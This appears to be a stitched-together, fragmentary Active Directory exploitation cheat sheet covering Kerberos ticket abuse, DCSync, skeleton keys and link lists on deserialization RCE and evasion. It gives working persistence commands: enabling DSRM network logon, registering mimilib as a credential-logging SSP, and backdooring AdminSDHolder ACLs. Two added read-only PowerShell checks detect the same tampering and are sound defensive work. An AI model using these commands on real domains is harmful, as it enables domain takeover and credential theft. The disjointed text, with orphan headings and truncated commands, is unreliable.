Once the cert.pfx file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB, certutil.exe, Cobalt Strike's upload functionality, etc.)
After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to request a Kerberos TGT for the DA account which will then be imported into memory.
This should result in a successfully imported ticket, which then enables an attacker to perform various malicious activities under DA user context, such as performing a DCSync attack.
No PAC
sAMAccountName Spoofing
Exploitation of CVE-2021-42278 and CVE-2021-42287
Domain Persistence 1
#DCsync using secretsdump.py from impacket with Kerberos Authentication
secretsdump.py
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -Verbose
From powershell:
#Get current Security Package:
$packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
#Append mimilib:
$packages += "mimilib"
#ALTERNATIVE:
Invoke-Mimikatz -Command '"misc::memssp"'
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
DCSync feature for getting krbtgt hash
ACCOUNT DUMPING
GOLDEN TICKET
■ On any machine
Invoke-Mimikatz Command | Resume
SILVER TICKET
Create a silver ticket for the HOST SPN which will allow us to schedule a task
SKELETON KEY
# REMOTE
# LOGIN
PASSWORD mimikatz
mimikatz # misc::skeleton
mimikatz # !-
DSRM
Dump DSRM password (needs DA privs)
/ntlm:00000000000000000000000000000000 /run:powershell.exe"
Dump local account
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
CHECK C:\Windows\system32\kiwissp.log
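The registry values and files this page mentions in the LSA Protection, DSRM and Security Support Provider sections (RunAsPPL, DsrmAdminLogonBehavior, the Security Packages lists, and the mimilsa.log/kiwissp.log outputs) are also what a host review checks for. The following PowerShell is an added example, not code from the text; it assumes it is run elevated on the host being reviewed and modifies nothing.

```powershell
# Added example (not from the text): local read-only checks for the LSA tampering the
# mimikatz sections above describe (RunAsPPL, DSRM logon behaviour, registered Security
# Packages, SSP log files). Run elevated on the host or DC under review. Registry paths
# and value names are the documented ones; log file names are those quoted in the text.

function Get-LsaTamperingReport {
    $lsa      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $osconfig = "$lsa\OSConfig"
    $system32 = Join-Path $env:SystemRoot 'System32'

    # 1. LSA Protection: RunAsPPL = 1 stops unsigned code (mimikatz included) from opening lsass
    $ppl = (Get-ItemProperty -Path $lsa -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
    $pplStatus = if ($ppl -eq 1) { 'ok' } else { 'REVIEW: LSA is not running as a protected process' }
    [pscustomobject]@{ Check = 'RunAsPPL'; Value = "$ppl"; Status = $pplStatus }

    # 2. DsrmAdminLogonBehavior = 2 lets the DSRM account log on over the network while
    #    the DC is running normally, which is what the persistence trick above needs
    $dsrm = (Get-ItemProperty -Path $lsa -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
    $dsrmStatus = if ($null -eq $dsrm -or $dsrm -eq 0) { 'ok (default)' } else { "REVIEW: value $dsrm" }
    [pscustomobject]@{ Check = 'DsrmAdminLogonBehavior'; Value = "$dsrm"; Status = $dsrmStatus }

    # 3. Security Packages: each entry is a DLL name LSA loads from System32 at boot.
    #    A name that does not resolve to a validly signed file there (e.g. mimilib) is suspect.
    foreach ($key in $lsa, $osconfig) {
        $pkgs = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($p in @($pkgs)) {
            if ([string]::IsNullOrWhiteSpace($p) -or $p -eq '""') { continue }   # an empty entry is stored as ""
            $dll = Join-Path $system32 "$p.dll"
            if (Test-Path -LiteralPath $dll) {
                $sig    = Get-AuthenticodeSignature -FilePath $dll
                $status = if ($sig.Status -eq 'Valid') { "ok ($($sig.SignerCertificate.Subject))" } else { "REVIEW: signature $($sig.Status)" }
            } else {
                $status = 'REVIEW: listed package has no DLL in System32'
            }
            [pscustomobject]@{ Check = "Security Packages ($(Split-Path $key -Leaf))"; Value = $p; Status = $status }
        }
    }

    # 4. Output files written by the mimilib SSP (registered) or misc::memssp (in-memory)
    foreach ($log in 'mimilsa.log', 'kiwissp.log') {
        $path   = Join-Path $system32 $log
        $status = if (Test-Path -LiteralPath $path) { 'REVIEW: SSP credential log present' } else { 'ok' }
        [pscustomobject]@{ Check = 'SSP log file'; Value = $path; Status = $status }
    }
}

Get-LsaTamperingReport | Format-Table -AutoSize -Wrap
```

A package injected purely in memory with misc::memssp leaves no registry entry, so on such a host only the log-file check (or a reboot) surfaces it; the registry checks catch the persistent mimilib variant.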
ADMINSDHOLDER
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder, and any differences are overwritten on the object ACL
Protected Groups
Groups | Resume
Replicator |
Account Operators | Cannot modify DA/EA/BA groups. Can modify nested groups within
Server Operators | Run a command as system (using the disabled Browser service)
Add FullControl permissions for a user to the AdminSDHolder using PowerView as DA
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights All -Verbose
ADACL -DistinguishedName
#
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights WriteMembers -Verbose
Import-Module Invoke-SDPropagator.ps1
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
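Because SDPROP rewrites the protected objects' ACLs hourly, the two traces this technique leaves are an extra write-capable ACE on AdminSDHolder itself and users that keep adminCount=1 after leaving the protected groups. The following PowerShell is an added read-only check for both (not the cheat sheet's own code); it assumes the RSAT ActiveDirectory module and labels only the four default full-control principals as expected.

```powershell
# Added example (not the cheat sheet's code): two read-only checks for the
# AdminSDHolder backdoor described above, using the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

function Get-AdminSDHolderReport {
    $domain = Get-ADDomain
    $holder = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    $sd     = (Get-ADObject $holder -Properties nTSecurityDescriptor).nTSecurityDescriptor
    # Any of these rights is enough to take over every protected object an hour later
    $write  = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty, ExtendedRight'
    # Principals that hold full control on AdminSDHolder by default. Other built-in
    # entries (Cert Publishers, SELF/Everyone change-password, ...) also appear and
    # should be compared against a known-good domain rather than assumed bad.
    $fullControlDefaults = @('S-1-5-18', 'S-1-5-32-544', "$($domain.DomainSID)-512", "$($domain.DomainSID)-519")

    foreach ($ace in $sd.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.ActiveDirectoryRights -band $write) -eq 0) { continue }
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { $sid = 'unresolved' }
        $status = if ($fullControlDefaults -contains $sid) { 'expected' } else { 'REVIEW' }
        [pscustomobject]@{
            Check     = 'AdminSDHolder ACE'
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.ActiveDirectoryRights.ToString()
            Status    = $status
        }
    }

    # SDPROP stamps adminCount=1 on every object it touches. A user that was removed
    # from the protected groups keeps the stamp and the hardened ACL (inheritance stays
    # off), so such orphans are both a hygiene problem and a trace of past membership.
    $protectedGroups = 'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators',
                       'Account Operators', 'Server Operators', 'Backup Operators', 'Print Operators'
    $members = foreach ($g in $protectedGroups) {
        try { (Get-ADGroupMember -Identity $g -Recursive -ErrorAction Stop).DistinguishedName } catch { }
    }
    $members = @($members)
    Get-ADUser -LDAPFilter '(adminCount=1)' | Where-Object {
        $members -notcontains $_.DistinguishedName -and $_.SamAccountName -notin 'Administrator', 'krbtgt'
    } | ForEach-Object {
        [pscustomobject]@{
            Check     = 'adminCount orphan'
            Principal = $_.SamAccountName
            Rights    = ''
            Status    = 'REVIEW'
        }
    }
}

Get-AdminSDHolderReport | Format-Table -AutoSize
```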
# ADD OBJECT ACL
# DCSYNC
Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ?{($_.IdentityReference -match "targetuser") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
Rights Abuse
Add FullControl rights
Add-ObjectAcl -TargetDistinguishedName 'DC=lab,DC=domain,DC=local' -PrincipalSamAccountName john -Rights All -Verbose
Execute DCSync
WMI
Verbose
Set-RemoteWMI -UserName jane -ComputerName DC01 -Credential Administrator -namespace 'root\cimv2' -Verbose
PSREMOTE
REMOTE REGISTRY
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet/tree/master/H%20-%20Persistence
Payload .NET
Additional Reading
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/march/finding-and-exploiting-.net-remoting-over-http-using-deserialisation/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
https://www.nccgroup.trust/uk/our-research/use-of-deserialisation-in-.net-framework-methods-and-classes/?research=Whitepapers
https://community.microfocus.com/t5/Security-Research-Blog/New-NET-deserialization-gadget-for-compact-payload-When-size/ba-p/1763282
https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/august/getting-shell-with-xamlx-files/
https://soroush.secproject.com/blog/2019/08/uploading-web-config-for-fun-and-profit-2/
Usage:
https://cert.360.cn/warning/detail?id=e689288863456481733e01b093c986b6
https://labs.mwrinfosecurity.com/advisories/milestone-xprotect-net-deserialization-vulnerability/
https://soroush.secproject.com/blog/2018/12/story-of-two-published-rces-in-sharepoint-workflows/
https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting-an-elevation-of-privilege-in-docker-for-windows.html
https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf
https://www.zerodayinitiative.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
https://www.zerodayinitiative.com/blog/2018/8/14/voicemail-vandalism-getting-remote-code-execution-on-microsoft-exchange-server
https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
https://www.nccgroup.trust/uk/our-research/technical-advisory-code-execution-by-viewing-resource-files-in-net-reflector/
https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys
Talks:
https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
https://speakerdeck.com/pwntester/attacking-net-serialization
https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending-vulnerable-endpoints
https://gosecure.github.io/presentations/2018-03-18-confoo_mtl/Security_boot_camp_for_.NET_developers_Confoo_v2.pdf
https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf
https://nullcon.net/website/archives/pdf/goa-2018/rohit-slides.pdf
Tools:
https://github.com/pwntester/ViewStatePayloadGenerator
https://github.com/0xACB/viewgen
https://github.com/Illuminopi/RCEvil.NET
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Cheat Sheet
Privilege Escalation
PASSWORDS IN SYSVOL & GROUP POLICY PREFERENCES
Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
DNSADMINS
UNCONSTRAINED DELEGATION
Domain Controller Print Server + Unconstrained Kerberos Delegation = Pwned Active Directory Forest
Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain)
Hunting in Active Directory: Unconstrained Delegation & Forests Trusts
CONSTRAINED DELEGATION
S4U2Pwnage
DOMAIN TRUSTS
A Guide to Attacking Domain Trusts
It's All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts
Active Directory forest trusts part 1 - How does SID filtering work?
The Forest Is Under Control. Taking over the entire Active Directory forest
The Trustpocalypse
DCSHADOW
DCShadow
DCShadow explained: A technical deep dive into the latest AD attack technique
DCShadow - Silently turn off Active Directory Auditing
DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more
RID
• Rid Hijacking: When Guests Become Admins
Lateral Movement
MICROSOFT SQL SERVER DATABASE LINKS
• SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server!
• WSUSpendu
PASSWORD SPRAYING
• Password Spraying Windows Active Directory Accounts - Tradecraft Security Weekly #5
• ANGRYPUPPY - Bloodhound Attack Path Automation in CobaltStrike
Defense Evasion
IN-MEMORY EVASION
OPSEC
• Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
SYSMON EVASION
HONEYTOKENS EVASION
Credential Dumping
NTDS.DIT PASSWORD EXTRACTION
• How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
• Extracting Password Hashes From The Ntds.dit File
SAM (SECURITY ACCOUNTS MANAGER)
KERBEROASTING
• Roasting AS-REPs
• Pwning with Responder – A Pentester’s Guide
• LLMNR/NBT-NS Poisoning Using Responder
OTHER
Persistence
GOLDEN TICKET
• Golden Ticket
• Kerberos Golden Tickets are Now More Golden
SID HISTORY
SILVER TICKET
SKELETON KEYS
• Unlocking All The Doors To Active Directory With The Skeleton Key Attack
• Skeleton Key
• Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest
SEENABLEDELEGATIONPRIVILEGE
• The Most Dangerous User Right You (Probably) Have Never Heard Of
SECURITY SUPPORT PROVIDER
• Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)
DIRECTORY SERVICES RESTORE MODE
• Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)
• Shadow Admins – The Stealthy Accounts That You Should Fear The Most
• The Unintended Risks of Trusting Active Directory
Tools & Scripts
• Mimikatz - Utility to extract plaintext passwords, hashes, PIN codes and kerberos tickets from memory but also perform pass-the-hash, pass-the-ticket or build Golden tickets
https://0x1.gitlab.io/pentesting/Active-Directory-Kill-Chain-Attack-and-Defense/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/CyberSecurityUP/Red-Team-Management/tree/main/Adversary%20Emulation